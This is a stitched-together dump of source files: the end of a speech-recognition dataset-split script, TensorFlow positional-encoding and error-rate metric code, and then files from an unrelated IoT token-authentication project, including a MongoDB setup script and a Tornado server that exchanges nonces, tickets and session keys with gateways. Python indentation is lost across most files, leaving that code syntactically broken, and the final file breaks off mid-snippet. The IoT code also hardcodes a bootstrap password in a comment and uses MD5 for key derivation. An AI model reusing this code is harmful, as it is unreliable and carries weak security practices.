for i, audio_filename in enumerate(files):
transcript = prompts.get(i + 1)
if transcript is None:
print(f'Sid: Missing | empty {audio_filename}')
continue
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def process_voxforge(voxforge_path, compute_duration):
print('Processing VoxForge')
folders = [os.path.join(voxforge_path, f.path) for f in os.scandir(voxforge_path) if f.is_dir()]
train = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
has_etc = os.path.exists(os.path.join(folder, 'etc'))
prompt_file = os.path.join(folder, f'{"etc/" if has_etc else ""}PROMPTS')
prompts = {}
path_prefix = f'{folder}/{"wav/" if has_etc else ""}'
with open(prompt_file) as f:
for l in f:
parts = l.strip().split(' ')
file_index = parts[0].split('/')[-1]
transcript = ' '.join(parts[1:]).lower()
if len(SPACES_PATTERN.sub('', transcript)) == 0:
continue
prompts[f'{path_prefix}{file_index}.wav'] = ' '.join(parts[1:]).lower()
for audio_filename in glob.glob(f'{path_prefix}/*.wav'):
transcript = prompts.get(audio_filename)
if transcript is None:
print(f'Voxforge: Missing | empty {audio_filename}')
continue
train.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return train, duration
def process_coral(coral_path, compute_duration):
print('Processing C-ORAL')
folders = [os.path.join(coral_path, f.path) for f in os.scandir(coral_path) if f.is_dir()]
data = []
duration = 0
for folder in tqdm(folders, total=len(folders)):
for transcript_path in glob.glob(f'{folder}/*.txt'):
audio_filename = transcript_path.replace('.txt', '.wav')
with open(transcript_path) as f:
transcript = clean_text(f.read().lower().strip())
data.append((audio_filename, transcript))
if compute_duration:
duration += get_duration(audio_filename)
return data, duration
def write_output_file(path, files):
output = ['PATH\tDURATION\tTRANSCRIPT']
output += ['\t'.join([file[0], '0', file[1]]) for file in files]
with open(path, 'w') as f:
f.write('\n'.join(output))
def write_lm_file(path, files):
output = []
for audio, transcript in tqdm(files, total=len(files)):
with open(transcript) as f:
output.append(f.read().strip())
with open(path, 'w') as f:
f.write('\n'.join(output))
def generate_datasets(alcaim_path, sid_path, voxforge_path, lapsbm_val_path, common_voice_path, random_seed, output_train, output_eval,
output_test, compute_duration, max_train, max_eval, coral_path):
train, eval, test = [], [], []
train_duration = 0
eval_duration = 0
test_duration = 0
if alcaim_path:
_train, _test, _train_duration, _test_duration = process_alcaim(alcaim_path, random_seed,
compute_duration=compute_duration)
train += _train
test += _test
train_duration += _train_duration
test_duration += _test_duration
if sid_path:
_train, _train_duration = process_sid(sid_path, compute_duration=compute_duration)
train += _train
train_duration += _train_duration
if lapsbm_val_path:
_eval, _eval_duration = process_generic(lapsbm_val_path, compute_duration=compute_duration)
eval += _eval
        eval_duration += _eval_duration
if voxforge_path:
_train, _train_duration = process_voxforge(voxforge_path, compute_duration=compute_duration)
train += _train
train_duration += _train_duration
if common_voice_path:
train += process_common_voice(common_voice_path, 'train.tsv')
train += process_common_voice(common_voice_path, 'dev.tsv')
test += process_common_voice(common_voice_path, 'test.tsv')
if coral_path:
_train, _train_duration = process_coral(coral_path, compute_duration)
train += _train
print(f'Total {len(train)} train files, eval {len(eval)}, {len(test)} test files')
if max_train > 0:
train = train[:max_train]
if max_eval > 0:
eval = eval[:max_eval]
write_output_file(output_train, train)
write_output_file(output_eval, eval)
write_output_file(output_test, test)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Generate datasets split")
parser.add_argument('--alcaim_path', type=str, help="CETUC dataset path")
parser.add_argument('--sid_path', type=str, help="SID dataset path")
parser.add_argument('--voxforge_path', type=str, help="SID dataset path")
parser.add_argument('--lapsbm_val_path', type=str, help="LapsBM val dataset path")
parser.add_argument('--common_voice_path', type=str, help="Common Voice dataset path")
parser.add_argument('--coral_path', type=str, help="C-ORAL dataset path")
parser.add_argument('--random_seed', type=int, default=42, help="Random seed")
parser.add_argument('--output_train', type=str, required=True, help='Output path file containing train files paths')
parser.add_argument('--output_eval', type=str, required=True, help='Output path file containing eval files paths')
parser.add_argument('--output_test', type=str, required=True, help='Output path file containing test files paths')
parser.add_argument('--compute_duration', action='store_true')
parser.add_argument('--max_train', type=int, default=-1, help='Max train files')
parser.add_argument('--max_eval', type=int, default=-1, help='Max eval files')
args = parser.parse_args()
kwargs = vars(args)
print('-' * 20)
print('Generating datasets with args: ')
for arg in vars(args):
print(f'{arg}: {getattr(args, arg)}')
print('-' * 20)
generate_datasets(**kwargs)
```
#### File: models/layers/positional_encoding.py
```python
import tensorflow as tf
from ...utils.utils import shape_list
class PositionalEncoding(tf.keras.layers.Layer):
def build(self, input_shape):
dmodel = input_shape[-1]
assert dmodel % 2 == 0, f"Input last dim must be even: {dmodel}"
@staticmethod
def encode(max_len, dmodel):
pos = tf.expand_dims(tf.range(max_len - 1, -1, -1.0, dtype=tf.float32), axis=1)
index = tf.expand_dims(tf.range(0, dmodel, dtype=tf.float32), axis=0)
pe = pos * (1 / tf.pow(10000.0, (2 * (index // 2)) / dmodel))
# Sin cos will be [max_len, size // 2]
# we add 0 between numbers by using padding and reshape
sin = tf.pad(tf.expand_dims(tf.sin(pe[:, 0::2]), -1),
[[0, 0], [0, 0], [0, 1]], mode="CONSTANT", constant_values=0)
sin = tf.reshape(sin, [max_len, dmodel])
cos = tf.pad(tf.expand_dims(tf.cos(pe[:, 1::2]), -1),
[[0, 0], [0, 0], [1, 0]], mode="CONSTANT", constant_values=0)
cos = tf.reshape(cos, [max_len, dmodel])
# Then add sin and cos, which results in [time, size]
pe = tf.add(sin, cos)
return tf.expand_dims(pe, axis=0) # [1, time, size]
def call(self, inputs, **kwargs):
# inputs shape [B, T, V]
_, max_len, dmodel = shape_list(inputs)
pe = self.encode(max_len, dmodel)
return tf.cast(pe, dtype=inputs.dtype)
def get_config(self):
conf = super(PositionalEncoding, self).get_config()
return conf
class PositionalEncodingConcat(tf.keras.layers.Layer):
def build(self, input_shape):
dmodel = input_shape[-1]
assert dmodel % 2 == 0, f"Input last dim must be even: {dmodel}"
@staticmethod
def encode(max_len, dmodel):
pos = tf.range(max_len - 1, -1, -1.0, dtype=tf.float32)
index = tf.range(0, dmodel, 2.0, dtype=tf.float32)
index = 1 / tf.pow(10000.0, (index / dmodel))
sinusoid = tf.einsum("i,j->ij", pos, index)
pos = tf.concat([tf.sin(sinusoid), tf.cos(sinusoid)], axis=-1)
return tf.expand_dims(pos, axis=0)
def call(self, inputs, **kwargs):
# inputs shape [B, T, V]
_, max_len, dmodel = shape_list(inputs)
pe = self.encode(max_len, dmodel)
return tf.cast(pe, dtype=inputs.dtype)
    def get_config(self):
        conf = super(PositionalEncodingConcat, self).get_config()
        return conf
```
#### File: tensorflow_asr/utils/metrics.py
```python
import numpy as np
import tensorflow as tf
from nltk.metrics import distance
from .utils import bytes_to_string
def wer(decode: np.ndarray, target: np.ndarray) -> (tf.Tensor, tf.Tensor):
"""Word Error Rate
Args:
decode (np.ndarray): array of prediction texts
target (np.ndarray): array of groundtruth texts
Returns:
tuple: a tuple of tf.Tensor of (edit distances, number of words) of each text
"""
decode = bytes_to_string(decode)
target = bytes_to_string(target)
dis = 0.0
length = 0.0
for dec, tar in zip(decode, target):
words = set(dec.split() + tar.split())
word2char = dict(zip(words, range(len(words))))
new_decode = [chr(word2char[w]) for w in dec.split()]
new_target = [chr(word2char[w]) for w in tar.split()]
dis += distance.edit_distance(''.join(new_decode), ''.join(new_target))
length += len(tar.split())
return tf.convert_to_tensor(dis, tf.float32), tf.convert_to_tensor(length, tf.float32)
def cer(decode: np.ndarray, target: np.ndarray) -> (tf.Tensor, tf.Tensor):
"""Character Error Rate
Args:
decode (np.ndarray): array of prediction texts
target (np.ndarray): array of groundtruth texts
Returns:
tuple: a tuple of tf.Tensor of (edit distances, number of characters) of each text
"""
decode = bytes_to_string(decode)
target = bytes_to_string(target)
dis = 0
length = 0
for dec, tar in zip(decode, target):
dis += distance.edit_distance(dec, tar)
length += len(tar)
return tf.convert_to_tensor(dis, tf.float32), tf.convert_to_tensor(length, tf.float32)
class ErrorRate(tf.keras.metrics.Metric):
""" Metric for WER and CER """
def __init__(self, func, name="error_rate", **kwargs):
super(ErrorRate, self).__init__(name=name, **kwargs)
self.numerator = self.add_weight(name=f"{name}_numerator", initializer="zeros")
self.denominator = self.add_weight(name=f"{name}_denominator", initializer="zeros")
self.func = func
def update_state(self, decode: tf.Tensor, target: tf.Tensor):
n, d = tf.numpy_function(self.func, inp=[decode, target], Tout=[tf.float32, tf.float32])
self.numerator.assign_add(n)
self.denominator.assign_add(d)
def result(self):
if self.denominator == 0.0: return 0.0
return (self.numerator / self.denominator) * 100
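# Example usage (a hedged sketch, not part of the original file):
# wer_metric = ErrorRate(wer, name="wer")
# wer_metric.update_state(decode=tf.constant([b"hello world"]), target=tf.constant([b"hello word"]))
# print(wer_metric.result().numpy())  # word error rate in percent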
``` |
{
"source": "joaoamaral28/iot-decentralized-token-auth",
"score": 3
} |
#### File: src/A3C_DD/storage.py
```python
import pymongo
import os
import datetime
from a3c_dd_security_module import *
db_client_name = "IOT_A3C_DD_DB"
collection_name = "crypto_info"
col_dd = "dd_info"
# generate public and private keys of the server
# only used to create the .pem files which already exist on the project folder
def generateServerKeyPair(password):
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
    priv_key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
pub_key = priv_key.public_key()
pub_key = pub_key.public_bytes(encoding=serialization.Encoding.PEM,format=serialization.PublicFormat.SubjectPublicKeyInfo)
priv_pem = priv_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8,encryption_algorithm=serialization.BestAvailableEncryption(password))
try:
with open("private_key_server.pem","w") as file:
file.write(priv_pem.decode())
with open("public_key_server.pem","w") as file:
file.write(pub_key.decode())
except Exception as exc :
print("Error occurred while writing key on file")
print(exc)
return
return
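# Note: the PEM files written above can be read back with the same password, e.g.
# serialization.load_pem_private_key(open("private_key_server.pem", "rb").read(),
#                                    password=password, backend=default_backend())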
def main():
# db init
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db[collection_name]
# col.drop()
# password hash+salt storage
password = b"<PASSWORD>!\"#$%&/()="
salt = os.urandom(16)
key = PBKDF2(password, salt)
d = {"key":key , "salt":salt }
x = col.insert_one(d)
for d in col.find({}):
print(d['key'])
print(d['salt'])
if __name__ == "__main__":
#main()
#generateServerKeyPair(b"123456789!\"#$%&/()=")
# ADD DD TO DB
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db[col_dd]
#col.drop()
info_dd_temp = {
"uuid" : "f17a1fe9d42b711c463cdad54e5db6f0",
"public_key": "-----BEGIN PUBLIC KEY-----\<KEY>
-----END PUBLIC KEY-----\n",
"name" : "temperature sensor",
"manufacturer" : "Wemos LOLIND32",
"api" : [ "readValue", "calibrateSensor", "setUnits"],
}
info_dd_light = {
"uuid" : "<KEY>",
"public_key": "-----<KEY>
-----END PUBLIC KEY-----\n",
"name" : "light actuator",
"manufacturer" : "Wemos LOLIND32",
"api" : ["turnOn", "turnOff", "getStatus", "increaseBrightness", "decreaseBrightness"],
}
# insert document
x = col.insert_one(info_dd_temp)
y = col.insert_one(info_dd_light)
################################################################
#################### CLIENT REQUEST ############################
################################################################
"""
client_pub_key = "-----<KEY>
-----END PUBLIC KEY-----"
encoded_client_pub_key = base64.b64encode(client_pub_key.encode())
client_uuid = digestSHA256(client_pub_key.encode())
request_id = "1"
device_id = "1"
#date = datetime.datetime.now()
date = "2019-05-16 17:02:39.082262"
document = encoded_client_pub_key + bytes(client_uuid.hex(),'utf-8') + bytes(request_id,'utf-8') + bytes(device_id,'utf-8') + bytes(date,'utf-8')
print(document)
print()
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
with open('../Client/private_client.pem', "rb") as key_file:
priv_key = serialization.load_pem_private_key(
key_file.read(),
password=<PASSWORD>,
backend=default_backend())
key_file.close()
signature = signRSA(priv_key, document)
encoded_signature = base64.b64encode(signature)
#print(encoded_signature)
print("Request ID: {}".format(request_id))
print("Client ID: {}".format(client_uuid.hex()))
print("Client key: {}".format(encoded_client_pub_key))
print("Device ID: {}".format(device_id))
print("Date: {}".format(date))
print("Signature: {}".format(encoded_signature))
"""
################################################################
################# ADD GW TO DATABASE ###########################
################################################################
"""
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
col = db["smarthome"]
info_gw1 = {
"uuid" : "38e998af01b5c8d8287a817211e5e52fb23a3e3bb031c0c1437746d9e148bd17",
"device_type" : "gateway",
"public_key": "<KEY>
"bt_addr" : "B8:27:EB:3E:C9:4B",
"slave_devices" : [
{ "uuid" : "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de" } #, "ble_addr": "30:AE:A4:EA:CA:A2" }
]
}
"""
# insert document
#x = col.insert_one(info_gw1)
# check if gateway exsits
"""
gw_id = "38e998af01b5c8d8287a817211e5e52fb23a3e3bb031c0c1437746d9e148bd17"
if(not col.count_documents({"uuid": gw_id})):
print("# Invalid registration request!\n## Received gateway ID doest not exists in local database!")
# self.write("....")
#return
print("Gateway ID valid and registered in local database")
doc = col.find({"uuid" : gw_id}).limit(1)[0]
slave_devices = doc['slave_devices']
# get info from gw slave devices
device_list = []
device_info = {}
for device in slave_devices:
device_uuid = device['uuid']
if(not col.count_documents({"uuid": device_uuid})):
print("# Error: IoT slave device ID {}, extracted from gateway document with ID {} not found in collection:{}, document{}!\n## Registration process aborted!".format(device_uuid,gw_id,"smarthome","devices_info"))
break
# self.write("....")
#return
doc_device = col.find({"uuid" : device_uuid}).limit(1)[0]
#print(doc_device)
if(doc_device['device_type'] != "host_device"):
print("# Error: Mismatch between device type.\n## Device type must be \"host_device\" but \"{}\" was found instead".format(doc_device['device_type']))
break
# self.write("...")
#return
if(doc_device['master_gateway'] != gw_id):
print("# Error: Mismatch between slave device and master gateway id\n## Master gateway id {} expected, found id {} instead".format(gw_id,doc_device['master_gateway']))
break
# self.write("...")
#return
device_info['uuid'] = device_uuid
device_info['bt_addr'] = doc_device['bt_addr']
device_info['driver_list'] = doc_device['driver_list']
device_list.append(device_info)
response_code = "OK"
response = {"code" : "OK", "device_record" : device_list}
print(device_info)
#signature = signRSA(server_priv_key, response)
print("All device information extracted successfully!")
print("Gateway registered successfully ")
#self.write(str({"response":response, "signature":signature}))
#return
"""
"""
info_esp1 = {
"uuid": "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de",
"device_type": "host_device",
"public_key": "<KEY>
"bt_addr" : "30:AE:A4:EA:CA:A2",
"master_gateway" : "<KEY>",
"driver_list" : [
{ "id": 1,
"type" : "sensor",
"subtype" : "temperature",
"actions": [
"readValue()",
"calibrateSensor()"
],
"description" : {
"Measurement units" : "Celcius",
"Operational temperature" : "[-10,50]",
"Model" : "model xzy",
"Manufacturer" : "abcdefg"
}
},
{ "id": 2,
"type" : "actuator",
"subtype" : "lightbulb",
"actions" : [
"turnOn()",
"turnOff()",
"increaseBrightness()",
"decreaseBrightness()"
],
"description" : {
"Measurement units" : "Celcius",
"Operational range" : "[-10,50]",
"Model" : "model yrz",
"Manufacturer" : "gfdsad"
}
}
]
}
x = col.insert_one(info_esp1)
device_id = "8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de"
doc = col.find({"uuid" : device_id}).limit(1)[0]
print(doc)
"""
# db = db_client[db_client_name]
#" col = db[collection_name]
# check if any gateway with the received id exists in the local database
# cursor = col.find({gateway_id: {"$exists": True}}).limit(1)
"""
[ {
'uuid': '8c408678593fff6c916f4177408633c1801fdc3bce650f83edbf43e6c06d79de',
'bt_addr': '30:AE:A4:EA:CA:A2',
'driver_list': [
{ 'id': 1,
'type': 'sensor',
'subtype': 'temperature',
'actions': ['readValue()', 'calibrateSensor()'],
'description': {'Measurement units': 'Celcius', 'Operational temperature': '[-10,50]', 'Model': 'model xzy', 'Manufacturer': 'abcdefg'}},
{ 'id': 2,
'type': 'actuator',
'subtype': 'lightbulb',
'actions': ['turnOn()', 'turnOff()', 'increaseBrightness()', 'decreaseBrightness()'],
'description': {'Measurement units': 'Celcius', 'Operational range': '[-10,50]', 'Model': 'model yrz', 'Manufacturer': 'gfdsad'}
}
]
}
]
"""
```
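The commented-out scratch code above walks through the gateway-registration lookup: validate the gateway UUID, then collect the bt_addr and driver_list of each slave host device. Below is a minimal sketch of that flow using pymongo's find_one; the database and collection names are assumptions taken from the sample documents above, and a fresh dict is built per device so the result list does not end up holding repeated references to one mutated dict (the pitfall in the scratch loop).
```python
# Minimal sketch (not part of the original handler) of the lookup pattern exercised above.
# Database/collection/field names are assumed from the sample documents shown earlier.
import pymongo

def collect_gateway_devices(gw_id, mongo_uri="mongodb://localhost:27017/",
                            db_name="IOT_DHM_DB", col_name="smarthome"):
    col = pymongo.MongoClient(mongo_uri)[db_name][col_name]
    gw = col.find_one({"uuid": gw_id, "device_type": "gateway"})
    if gw is None:
        return None  # unknown gateway: the registration request should be rejected
    devices = []
    for slave in gw.get("slave_devices", []):
        doc = col.find_one({"uuid": slave["uuid"], "device_type": "host_device"})
        # skip slaves that are missing or that point at a different master gateway
        if doc is None or doc.get("master_gateway") != gw_id:
            continue
        devices.append({"uuid": doc["uuid"],
                        "bt_addr": doc["bt_addr"],
                        "driver_list": doc["driver_list"]})
    return devices
```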
#### File: src/DHM/DHM_server.py
```python
import pymongo
import os
import base64
import datetime
from tornado.ioloop import IOLoop
from tornado.web import Application, RequestHandler
import threading
import getpass
import json
import logging
import ast
import time
from urllib import request, parse
import requests
import operator
from queue import Queue
from dhm_security_module import *
# logger setup
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s",
handlers=[
logging.FileHandler("{0}/{1}.log".format(os.getcwd()+"/logs/", "logger")),
logging.StreamHandler()
])
logger = logging.getLogger()
HOST = "localhost"
PORT = 7777
db_client_name = "IOT_DHM_DB"
col_a3c_gw = "a3c_gw_info"
col_gw = "gw_info"
col_dh = "dh_info"
db_client = None
GW_ADDR = "http://192.168.1.79" # Hardcoded gateway address (assuming discovery already occurred inside the local area network)
GW_PORT = "1111" # hardcoded gateway port
# dictionary containing the connection session properties with the clients
# A session includes
# > session key
# > ...
connections = {}
# list of devices managed by this dhm server
dh_list = []
# list of gateways to communicate
gw_list = []
# global variables
server_id = None
server_pub_key_pem = None
server_pub_key = None
server_priv_key = None
# thread responsible for revoking the client session
# every X seconds the thread will check for clients
class ConnectionManager(threading.Thread):
def run(self):
# < TODO >
print("oi")
# Class to be used if the registration process is initiated
# by the AAA server itself. The server polls for online
# gateways and sends its information and location to
# the gateway. The registration is performed by also
# sending its public key along with its signature.
# < TODO >
'''
class RegistrationManager(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
def run(self):
return
'''
class MainHandler(RequestHandler):
def get(self):
self.write("IoT DHM Server")
# Class to be used if the registration process is initiated by
# the gateways themselves. They actively wait and probe for the
# AAA server to become operational; once it is, they announce their
# identity to the server, which must verify that it is valid.
class RegistrationHandler(RequestHandler):
def post(self):
return
class AuthenticationHandler(RequestHandler):
def post(self):
return
class DHConfirmHandler(RequestHandler):
def post(self):
dh_uuid = self.get_body_argument('dh_uuid')
status = self.get_body_argument('status')
print(status)
if(status == "OK"):
logger.info("DH " + dh_uuid +" successfully configured")
def get(self):
print("GET")
def make_app():
urls = [
("/", MainHandler),
("/authenticationRequest/", AuthenticationHandler),
("/registrationRequest/", RegistrationHandler),
("/dhSessionConfirm/", DHConfirmHandler)
]
return Application(urls, debug=True)
def authTicketGen(device, derived_key, gw_id):
key = os.urandom(16) # 128 bit key for GW <-> DH session
#secret = encryptRSA(loadKey(device['pub_key'].encode()), key)
secret = encryptRSAPKCS1v15(loadKey(device['pub_key'].encode()), key)
#print("Session key (K) for GW <-> DH session establishment")
#for b in key:
# print(int(b))
public = {'dh_id' : device['uuid'], 'dh_addr' : device['ble_addr'], 'owner_id' : gw_id, 'access_rights' : 'Rx', 'ticket_lifetime': 3600}
m = secret + str(public).encode()
signature = signRsaPKCS1v15(server_priv_key, m)
ticket = {
'secret': secret, #base64.b64encode(secret),
'public' : base64.b64encode(str(public).encode()),
'signature': signature #base64.b64encode(signature),
}
return ticket, key
# thread responsible for managing the connections and sessions between the DHM and each GW
class DHM_GW_Session(threading.Thread):
def __init__(self, queue, gw_addr, gw_id, a3c_pub_key, session_key, ticket, sleep_delta):
threading.Thread.__init__(self)
self.queue = queue
self.gw_addr = gw_addr # url address of the GW
self.gw_id = gw_id # uuid of the gw
self.gw_a3c_pub_key = a3c_pub_key
self.session_key = session_key # session key computed from the handshake with the A3C_GW
self.ticket = ticket # the ticket that authenticates the DHM as valid for session establishment
self.sleep_delta = sleep_delta # time interval between retrying to communicate with the GW in case it failed before
#self.delta = base64.b64decode(ticket['public'])['expiration_date'] # duration of the session in seconds
self.r1 = os.urandom(16) # nonce to send to gw
self.derived_key = None
def run(self):
while True:
#print("# Starting DHM <-> GW session...")
logger.info("Starting DHM <-> GW session. GW UUID " + self.gw_id)
req_body = {
'ticket' : self.ticket,
'public_key' : base64.b64encode(serializeKey(self.gw_a3c_pub_key)),
'nonce' : base64.b64encode(self.r1)
}
data = parse.urlencode(req_body).encode()
#req = request.Request(self.gw_addr+"/dhmSessionSetup/", data)
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhmSessionSetup/", data)
response = ast.literal_eval(request.urlopen(req).read().decode())
#print(response)
r2 = base64.b64decode(response['nonce'])
# compute derived key K'
self.derived_key = digestMD5(self.session_key, [self.r1, r2])
#print("Derived session key (K') with GW")
#for b in self.derived_key:
# print(int(b))
# validate the sent nonce r1 by decrypting it
recv_r1 = decryptAES(response['enc_nonce'][0],self.derived_key,response['enc_nonce'][1])
# encrypt the received nonce r2
# these last two steps are required to ensure that targets do not create a session
# for an attacker using a stolen ticket
data_final = { 'nonce' : base64.b64encode(str(encryptAES(self.derived_key, r2)).encode()) }
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhmSessionSetup/validation/", parse.urlencode(data_final).encode()) #######################
request.urlopen(req)
#response =... # is there a response to this message ?
#print("## Session established successfully with the target GW")
logger.info("Successfully established session with GW UUID: " + self.gw_id)
# now that the session is established, the DHM sends authentication tickets so that
# the GW can locate the devices and authenticate itself to them
# fetch DHs managed by this gateway
# and generate the respective access token
logger.info("Fetching DHs data to configure target GW UUID " + self.gw_id)
managed_dhs = []
auth_data = {} # authentication data containing the dh ticket and its respective session key with the gw encrypted with gw public key
for device in dh_list:
if(device['master_gw_uuid'] == self.gw_id):
managed_dhs.append(device)
ticket, key = authTicketGen(device, self.derived_key, self.gw_id)
gw_pub_key = [g for g in gw_list if g['uuid'] == self.gw_id][0]['pub_key']
#auth_data[device['uuid']] = [ ticket, encryptRSA(loadKey(gw_pub_key.encode()), key)]
enc_key, iv = encryptAES(key, self.derived_key)
#print("AES Encrypted Key")
#for b in enc_key:
# print(int(b))
#print("IV")
#for b in iv:
# print(int(b))
#print("KEY used in AES cipher")
#for b in self.derived_key:
# print(int(b))
auth_data[device['uuid']] = [ ticket, enc_key, iv ]
d = base64.b64encode(str(auth_data).encode())
# the HMAC is generated over the base64-encoded payload so that dictionary reordering
# at the GW endpoint cannot result in a different HMAC
hmac = generateHMAC(self.derived_key, d)
request_data = {
'data' : d,
'signature' : base64.b64encode(hmac)
}
logger.info("Sending configuration tickets to target GW UUID " + self.gw_id)
req = request.Request(GW_ADDR+":"+GW_PORT+"/dhTickets/", parse.urlencode(request_data).encode()) ########################################################
response = request.urlopen(req).read().decode()
logger.info(response)
# thread blocks until receiving any new data
#job = self.queue.get()
#if job == "Session_renew":
# # do work
# elif job is None:
# break
return
#time.sleep(self.sleep_delta)
# thread responsible for managing the connections and sessions between the DHM and each A3C GW server
class DHM_A3C_Session(threading.Thread):
def __init__(self, a3c_uuid, addr, a3c_pub_key, target_gw_id, target_gw_addr, delta, sleep_delta):
threading.Thread.__init__(self)
self.a3c_uuid = a3c_uuid # uuid of the a3c server
self.a3c_addr = addr # url address for the a3c
self.a3c_pub_key = loadKey(a3c_pub_key) # public key of the a3c
self.target_gw_id = target_gw_id
self.target_gw_addr = target_gw_addr
self.delta = delta # duration of the session in seconds.
self.sleep_delta = sleep_delta # time interval between retrying to communicate with the A3C in case it failed before
self.r1 = os.urandom(16) # nonce to send to A3C
#self.session_key = None
def run(self):
while True:
try:
#print("# Fecthing ticket from A3C_GW...")
logger.info("Fetching ticket from A3C GW with uuid " + self.a3c_uuid)
req_body = {
'id' : self.target_gw_id, # id of the target gateway to be accessed
'public_key' : base64.b64encode(server_pub_key_pem),
'nonce' : base64.b64encode(encryptRSA(self.a3c_pub_key, self.r1))
}
data = parse.urlencode(req_body).encode()
req = request.Request(self.a3c_addr+"/ticketFetch/", data)
#response = request.urlopen(req).read().decode()
response = ast.literal_eval(request.urlopen(req).read().decode())
#print(response)
# recover nonce2
nonce2 = decryptRSA(server_priv_key,base64.b64decode(response['nonce']))
ticket = response['ticket']
a3c_public_key = base64.b64decode(response['public_key'])
# compute session key using the retrieved nonce
session_key = bytes(map(operator.xor, self.r1, nonce2))
#print("## Ticket fetched successfully!")
logger.info("Successfully fetched ticket from " + self.a3c_uuid)
# start DHM-GW connection and session establishment
dhm_gw_session_queue = Queue()
dhm_gw_session = DHM_GW_Session(dhm_gw_session_queue,self.target_gw_addr, self.target_gw_id, self.a3c_pub_key, session_key, ticket, self.sleep_delta)
dhm_gw_session.start()
return
#Once the session expires the thread must restart
# < TODO >
except requests.exceptions.ConnectionError:
print("# Failed to connect to server \n## Trying again in {} seconds".format(self.sleep_delta))
#except Exception as exc:
# print(exc)
# print("# An error ocurred while registering in the server\n## Trying again in {} seconds".format(self.sleep_delta))
time.sleep(self.sleep_delta)
return
def main():
# server password input
# it will be used to load the server private key
#server_password = bytes(getpass.getpass(),'utf-8')
server_password = b"<PASSWORD>!\"#$%&/()="
#print("# IOT DHM server starting...")
logger.info("DHM server starting")
# init database
logger.info("Loading database")
global db_client
db_client = pymongo.MongoClient("mongodb://localhost:27017/")
db = db_client[db_client_name]
crypt_col = db["crypto_info"]
logger.info("Fetching hashed password from database")
for d in crypt_col.find({}):
db_hash = d['key']
db_salt = d['salt']
if not db_hash:
logger.critical("Password not found in local database")
return
if not db_salt:
logger.critical("Password salt value not found in local database ")
return
# check if password matches the salted hash stored in database
key = PBKDF2(server_password, db_salt)
if(not verifyPKBDF2(key, server_password, db_salt)):
#print("ERROR: Invalid password!")
logger.critical("Provided bootstrap password does not match stored password")
return
else:
#print("## Correct password")
logger.info("Correct bootstrap password")
# load server key_pair from file
global server_pub_key_pem
server_pub_key_pem = loadKeyPEM("rsa_dhm","public",password=<PASSWORD>,path="")
if(server_pub_key_pem == -1):
logger.critical("Failed to load public key")
return
logger.info("Public key loaded successfully")
global server_priv_key
server_priv_key = loadKeyPEM("rsa_dhm","private",server_password,path="")
if(server_priv_key == -1):
logger.critical("Failed to load private key")
return
logger.info("Private key loaded successfully")
global server_pub_key
server_pub_key = loadKey(server_pub_key_pem)
#print("## Keys loaded successfully!")
# DHM id is equal to the digest of its public key
global server_id
server_id = digestMD5(server_pub_key_pem).hex()
#print("Server ID: " + server_id)
logger.info("Server ID : " + server_id)
## LOGIN procedure complete ##
# fetch info on the DHs this DHM manages from the db
dh_col = db[col_dh]
global dh_list
for d in dh_col.find({}):
dh_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'ble_addr' : d['ble_addr'],
'master_gw_uuid' : d['master_gw_uuid']
})
#print(dh_list)
logger.info("Successfully loaded DHs info from local database")
# fetch GW info from db
gw_col = db[col_gw]
global gw_list
for d in gw_col.find({}):
gw_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'addr' : d['addr'],
'master_a3c_uuid' : d['master_a3c_uuid']
})
#print(gw_list)
logger.info("Successfully loaded GWs info from local database")
# fetch A3C GW info from database (address, uuid, public key)
a3c_gw_col = db[col_a3c_gw]
a3c_gw_list = []
for d in a3c_gw_col.find({}):
a3c_gw_list.append({
'uuid' : d['uuid'],
'pub_key' : d['pub_key'],
'addr' : d['addr']
})
#print(a3c_gw_list)
for device in dh_list:
target_gw_id = device['master_gw_uuid']
# get info of device gw
gw = [g for g in gw_list if g['uuid'] == target_gw_id ]
gw_a3c_server_uuid = gw[0]['master_a3c_uuid']
target_gw_addr = gw[0]['addr']
#print(target_gw_addr)
# get info of the master a3c of the target gw
a3c_gw = [a for a in a3c_gw_list if a['uuid'] == gw_a3c_server_uuid][0]
a3c_gw_address = a3c_gw['addr']
a3c_gw_pub_key = a3c_gw['pub_key']
## Start DHM-A3C session. # 1 session <=> 1 thread
logger.info("Starting session with GW A3C server: " + gw_a3c_server_uuid)
t = DHM_A3C_Session(gw_a3c_server_uuid, a3c_gw_address, a3c_gw_pub_key.encode(), target_gw_id, target_gw_addr, 3600, 60)
t.start()
## Init REST/web server ##
# init tornado web server
app = make_app()
app.listen(PORT)
#print("Server online and listening")
logger.info("Starting web server")
IOLoop.current().start()
if __name__ == "__main__":
main()
```
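A stdlib-only sketch of the key handling performed by DHM_A3C_Session and DHM_GW_Session above: the session key is the XOR of the two exchanged nonces, a derived key is computed from it plus the GW-side nonces, and the HMAC is taken over the base64-encoded payload. The exact constructions live in dhm_security_module (not shown), so the MD5-based derivation and the SHA-256 HMAC below are assumptions made purely for illustration.
```python
# Illustrative only: digestMD5 / generateHMAC come from dhm_security_module, which is not
# shown here, so the exact digest constructions below are assumptions.
import base64
import hashlib
import hmac
import operator
import os

r1 = os.urandom(16)                                   # DHM nonce sent to the A3C
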